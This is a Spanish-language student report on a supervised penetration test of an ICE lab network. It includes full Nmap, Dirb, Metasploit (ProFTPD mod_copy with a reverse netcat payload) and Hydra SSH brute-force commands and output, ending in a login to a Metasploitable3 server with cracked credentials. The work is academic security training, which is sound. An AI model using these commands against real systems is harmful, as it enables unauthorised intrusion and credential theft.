

Planeamiento de Penetration testing del laboratorio del ICE

Andrés Méndez Solano <https://orcid.org/0009-0004-7187-882X>

Escuela de informática, Universidad Nacional, Heredia, Costa Rica
Profesor: Henry Guevara Guevara
Año: 2024

Resumen

Este trabajo presenta la planificación y ejecución de un test de penetración en un entorno de laboratorio del Instituto Costarricense de Electricidad (ICE). El objetivo es identificar vulnerabilidades dentro de la red interna a través de una conexión VPN mal configurada que podría permitir el acceso no autorizado a zonas críticas, como la Zona Desmilitarizada (DMZ). La metodología sigue las fases de reconocimiento, escaneo, explotación y reporte. Utilizando herramientas como Nmap, OpenVAS y Metasploit, se logró comprometer un servidor vulnerable (Metasploitable3) mediante técnicas de fuerza bruta, y se documentaron los hallazgos y recomendaciones de seguridad.

Palabras clave— Penetration testing, VPN, DMZ, vulnerabilidades, Nmap, OpenVAS, Metasploit, fuerza bruta.

Abstract

This paper presents the planning and execution of a penetration test in a laboratory environment of the Costa Rican Electricity Institute (ICE). The main objective is to identify vulnerabilities within the internal network via a misconfigured VPN connection, potentially allowing unauthorized access to critical areas such as the Demilitarized Zone (DMZ). The methodology follows the phases of reconnaissance, scanning, exploitation, and reporting. Using tools such as Nmap, OpenVAS, and Metasploit, a vulnerable server (Metasploitable3) was successfully compromised through brute-force techniques, and the findings and security recommendations were documented.

Index Terms— Penetration testing, VPN security, Demilitarized Zone, network vulnerabilities, brute-force attack, cybersecurity tools, ethical hacking.

I. INTRODUCCIÓN

En el panorama actual de la seguridad informática, donde las amenazas evolucionan constantemente, las pruebas de penetración (pentesting) se han convertido en una práctica indispensable para evaluar y fortalecer la resiliencia de los sistemas informáticos. Las crecientes tendencias de trabajo remoto y la necesidad de acceso a recursos internos desde ubicaciones externas han impulsado el uso generalizado de redes privadas virtuales (VPN). Si bien las VPN ofrecen un túnel seguro para la transmisión de datos, su incorrecta configuración o la presencia de vulnerabilidades pueden convertirse en puntos de entrada para atacantes, poniendo en riesgo la seguridad de la red interna, incluyendo zonas críticas como la Zona Desmilitarizada (DMZ).

Este trabajo presenta el planeamiento de un pentesting que simula un ataque real con el objetivo principal de identificar vulnerabilidades que permitan a un atacante externo acceder a la red interna a través de la VPN y comprometer la seguridad de la DMZ. El alcance de esta prueba se centra en comprometer el servidor accediendo al mismo y extraer evidencia de la penetración, esto se hará bajo supervisión del profesor Henry Guevara Guevara y con motivos única y exclusivamente académicos. Se excluyen del alcance de este pentesting las pruebas de denegación de servicio, enfocándose únicamente en la identificación y explotación de vulnerabilidades.

La metodología a seguir se basa en las cuatro fases: reconocimiento, donde se recopilará información sobre la VPN y la DMZ; escaneo, para descubrir puertos abiertos y vulnerabilidades; explotación, buscando obtener acceso al sistema a través de las vulnerabilidades identificadas; y finalmente, reporte, donde se documentarán los hallazgos,

las acciones tomadas y las recomendaciones para fortalecer la seguridad del sistema.

II. METODOLOGÍA Y PLAN DE PRUEBAS

A. Fase de Reconocimiento

A todos los estudiantes se les dará un archivo .ovpn para establecer una conexión por túnel vpn hacia la LAN en la que se encuentran los servidores para el laboratorio, los cuáles van a tener las siguientes direcciones ip privadas:

- 192.168.20.43
- 192.168.20.42
- 192.168.20.41

A partir de acá se maneja un reconocimiento inicial y es desde el cual se parte hacia la siguiente etapa. Acá el atacante se encuentra en una zona desmilitarizada (DMZ, por sus siglas en inglés), es importante aclarar que el usuario va a entrar mediante una instancia del sistema operativo Kali Linux que corre virtualmente en una máquina Windows usando WSL (Windows Subsystem for Linux, por sus siglas en inglés).

B. Fase de Escaneo

Para esta fase se plantea utilizar la herramienta Greenbone Vulnerability Management (GVM, por sus siglas en inglés), también conocida como Open Vulnerability Assessment System (OpenVAS, por sus siglas en inglés), también se va a usar la herramienta NMAP para hacer un escaneo de puertos sobre los servidores y a partir de estos buscar vulnerabilidades, lo cual es la meta de esta fase.

También se va a usar la herramienta Dirb para encontrar directorios o archivos ocultos en los servidores http y https.

Utilizando la herramienta ZenMap (Frontend de NMAP) se hace una representación visual de la topología de la red la cual es la siguiente:

Al ingresar la dirección 192.168.50.1 en el navegador se muestra el inicio de sesión de un sistema pfsense, esto significa que este es el Gateway del router el cual funciona como firewall entre los dispositivos de la LAN.

Otra representación de la topología es la siguiente:

Comandos NMAP:

`nmap -p- 192.168.20.##`

```
(kali-andres@RICARDO-PC)-[usr/lib/win-kex/pulse] account
└─$ nmap -p- 192.168.20.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 14:09 CST
Nmap scan report for 192.168.20.41
Host is up (0.019s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
5001/tcp  open  complex-link
8080/tcp  open  http-proxy
8081/tcp  open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 8.89 seconds
```

```
Nmap scan report for 192.168.20.42
Host is up (0.019s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
445/tcp   open  microsoft-ds
631/tcp   open  ipp
3000/tcp  closed ppp
3306/tcp  open  mysql
3500/tcp  open  rtmp-port
6697/tcp  open  ircs-u
8080/tcp  open  http-proxy
8181/tcp  closed intermapper

Nmap done: 1 IP address (1 host up) scanned in 105.57 seconds
```

`nmap -sV -p80,443 192.168.20.42`

```
(kali-andres@RICARDO-PC)-[~/usr/lib/win-kex/pulse]
└─$ nmap -sV -p80,443 192.168.20.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 14:26 CST
Nmap scan report for 192.168.20.42
Host is up (0.022s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.7
443/tcp   filtered https
Service Info: Host: 127.0.0.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 8.88 seconds
```

Comandos de Dirb:

dirb <http://192.168.20.42>

```
END_TIME: Wed Sep 18 14:35:52 2024
DOWNLOADED: 23060 - FOUND: 15
```

nmap -p 445 --script smb-vuln* 192.168.20.41

```
(kali-andres@RICARDO-PC)-[~/usr/lib/win-kex/pulse]
└─$ nmap -p 445 --script smb-vuln* 192.168.20.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 14:47 CST
Nmap scan report for 192.168.20.41
Host is up (0.020s latency).

PORT      STATE SERVICE
445/tcp   open  microsoft-ds

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
|_smb-vuln-regsvc-dos:
|  VULNERABLE:
|  Service regsvc in Microsoft Windows systems vulnerable to denial of service
|  State: VULNERABLE
|  The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds

(kali-andres@RICARDO-PC)-[~/usr/lib/win-kex/pulse]
└─$
```

smb-vuln-regsvc-dos: Indica que el servicio regsvc en sistemas Windows está vulnerable a un ataque de denegación de servicio (DoS). Esta vulnerabilidad puede causar que el servicio se bloquee, pero no necesariamente proporciona acceso a la máquina.

C. Fase de Explotación

Para esta fase se va a utilizar la herramienta de Metasploit-framework para buscar los exploits específicos dependiendo de las vulnerabilidades encontradas.

Comandos de mfsconsole:

search proftpd

```
msf6 > search proftpd

Matching Modules

#  Name                                     Disclosure Date  Rank  Check  Description
-  -
0  exploit/linux/misc/ntsupport_manager_agent 2011-01-08      average No     NtSupport Manager
1  exploit/linux/ftp/proftpd_sslpace         2005-11-26      great  Yes     ProFTPD 1.2 - 1.3.
2  \ target: Automatic Targeting             .               .      .      .
3  \ target: Debug                             .               .      .      .
4  \ target: ProFTPD 1.3.0 (source install) / Debian 3.1 .               .      .      .
5  exploit/freesoft/ftp/proftpd_telnet_tac   2018-11-01      great  Yes     ProFTPD 1.3.2rc3 -
6  \ target: Automatic Targeting             .               .      .      .
7  \ target: Debug                             .               .      .      .
8  \ target: ProFTPD 1.3.2a Server (FreeBSD 0.0) .               .      .      .
9  exploit/linux/ftp/proftpd_telnet_tac     2018-11-01      great  Yes     ProFTPD 1.3.2rc3 -
10 \ target: Automatic Targeting             .               .      .      .
11 \ target: Debug                             .               .      .      .
12 \ target: ProFTPD 1.3.2a Server (Debian) - Squeeze Beta1 .               .      .      .
13 \ target: ProFTPD 1.3.2a Server (Debian) - Squeeze Beta1 (Debug) .               .      .      .
14 \ target: ProFTPD 1.3.2c Server (Ubuntu 10.04) .               .      .      .
15 exploit/unix/ftp/proftpd_modcopy_exec    2015-04-22      excellent Yes     ProFTPD 1.3.5 Mod-
16 exploit/unix/ftp/proftpd_133c_backdoor   2018-12-02      excellent No     ProFTPD 1.3.3c Bac
```

use exploit/unix/ftp/proftpd_modcopy_exec

```
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
```

set RHOSTS 192.168.20.42

```
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.20.42
RHOSTS => 192.168.20.42
```

exploit

```
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > exploit
[*] Started reverse TCP handler on 172.20.50.73:4444
[*] 192.168.20.42:80 - 192.168.20.42:21 - Connected to FTP server
[*] 192.168.20.42:80 - 192.168.20.42:21 - Sending copy commands to FTP server
[-] 192.168.20.42:80 - Exploit aborted due to failure: unknown: 192.168.20.42:21 - Failure copying PHP payload to website path, directory not writable?
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) >
```

use auxiliary/scanner/smb/smb_ms17_010

run

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.20.41:445 - Host does NOT appear vulnerable.
[*] 192.168.20.41:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
```

III. REPORTE

A. Vulnerabilidades encontradas

Servidor 192.168.20.41:

La vulnerabilidad que aparece en el resultado de Nmap, identificada como smb-vuln-regsvc-dos, se refiere a un problema de denegación de servicio (DoS) en sistemas Microsoft Windows 2000 que afecta el servicio regsvc. Este servicio es vulnerable debido a un error de referencia a un puntero nulo, lo que puede provocar que el sistema deje de funcionar si se explota. Esta vulnerabilidad, descubierta por Ron Bowes, permite que un atacante interrumpa el servicio afectado, inutilizándolo.

```

(kali-andres@RICARDO-PC)-[~/usr/lib/win-kex/pulse]
$ nmap -p 445 --script smb-vuln* 192.168.20.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 14:47 CST
Nmap scan report for 192.168.20.41
Host is up (0.020s latency).

PORT      STATE SERVICE
445/tcp   open  microsoft-ds

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-regsvcs-dos:
| VULNERABLE:
| Service regsvcs in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvcs in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null dereference pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes while working on smb-enum-sessions.
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds
(kali-andres@RICARDO-PC)-[~/usr/lib/win-kex/pulse]
$

```

Servidor 192.168.20.42:

Este Servidor es un Metasploitable3, viene intencionalmente mal configurado y lleno de vulnerabilidades conocidas, como configuraciones inseguras, servicios desactualizados y software con fallos de seguridad.

En el repositorio <https://github.com/rapid7/metasploitable3> Se encuentran algunas de las posibles credenciales para ingresar al servidor, gracias a eso y a la herramienta de Hydra, se realizó un ataque de fuerza bruta para entrar a los servicios de SSH.

Servidor 192.168.20.43:

En este servidor no hubo éxito ni en el escaneo ni en la penetración ya que las herramientas no eran capaz de detectarlo, esto indica que existe una posibilidad de que esté protegido por reglas de firewall o ACL en algún punto de la red, penetrar el router y anular esa regla podría liberar el camino, pero eso no fue posible realizar en este laboratorio.

B. Evidencias de la intrusión

Servidor 192.168.20.42:

Usando la herramienta de fuerza bruta de Hydra y listas de seguridad encontradas en internet fue posible conectarse al ssh del servidor:

```

(kali-andres@RICARDO-PC)-[~/lists]
$ ls
fuzzdb  hydra.restore  passStarWars.txt  passwordsMeta3.txt  passwords.txt  SecList.zip  userStarWars.txt

(kali-andres@RICARDO-PC)-[~/lists]
$ sudo hydra -L userStarWars.txt -P passStarWars.txt ssh://192.168.20.42
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret services, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-02 16:33:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous
[DATA] max 16 tasks per 1 server, overall 16 tasks, 256 login tries (1:16/p:16), -16 tries per task
[DATA] attacking ssh://192.168.20.42:22/
[22][ssh] host: 192.168.20.42  login: jarjar_binks  password: mesah_pässw0rd
[22][ssh] host: 192.168.20.42  login: boba_fett  password: mandalorian1
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-02 16:34:08

(kali-andres@RICARDO-PC)-[~/lists]
$

```

Aquí se obtienen las credenciales que permiten acceso.

```

(kali-andres@RICARDO-PC)-[~/lists]
$ ssh jarjar_binks@192.168.20.42
jarjar_binks@192.168.20.42's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation: https://help.ubuntu.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

jarjar_binks@metasploitable3-ub1404:~$ ls
jarjar_binks@metasploitable3-ub1404:~$ ps aux
USER      PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 33856 3244 ?        Ss   May14   0:26 /sbin/init
root         2  0.0  0.0      0     0 ?        S    May14   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    May14   0:08 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    May14   0:00 [kworker/0:0]
root         5  0.0  0.0      0     0 ?        S<   May14   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        S    May14   0:02 [kworker/u4:0]
root         7  0.0  0.0      0     0 ?        S    May14   0:24 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    May14   0:27 [rcuos/0]
root         9  0.0  0.0      0     0 ?        S    May14   0:13 [rcuos/1]
root        10  0.0  0.0      0     0 ?        S    May14   0:00 [rcu_bh]
root        11  0.0  0.0      0     0 ?        S    May14   0:00 [rcuob/0]

```

Aquí se muestra la intrusión al ssh del servidor.

IV. CONCLUSIÓN

El pentesting permitió identificar varias vulnerabilidades, especialmente en el servidor Metasploitable3, cuya configuración intencionalmente insegura facilitó el acceso a través de un ataque de fuerza bruta. Aunque el servidor 192.168.20.41 presentó una vulnerabilidad de denegación de servicio, el servidor 192.168.20.43 no pudo ser comprometido debido a posibles protecciones de firewall. Este análisis subraya la importancia de una correcta configuración de la VPN y el refuerzo de la seguridad en redes internas.

REFERENCIAS

[1] "OpenVAS: Qué es y cómo funciona esta herramienta", InnovaciónDigital360. Consultado: el 5 de septiembre de 2024. [En línea]. Disponible en: <https://www.innovaciondigital360.com/cyber-security/openvas-que-es-y-como-funciona-esta-herramienta/>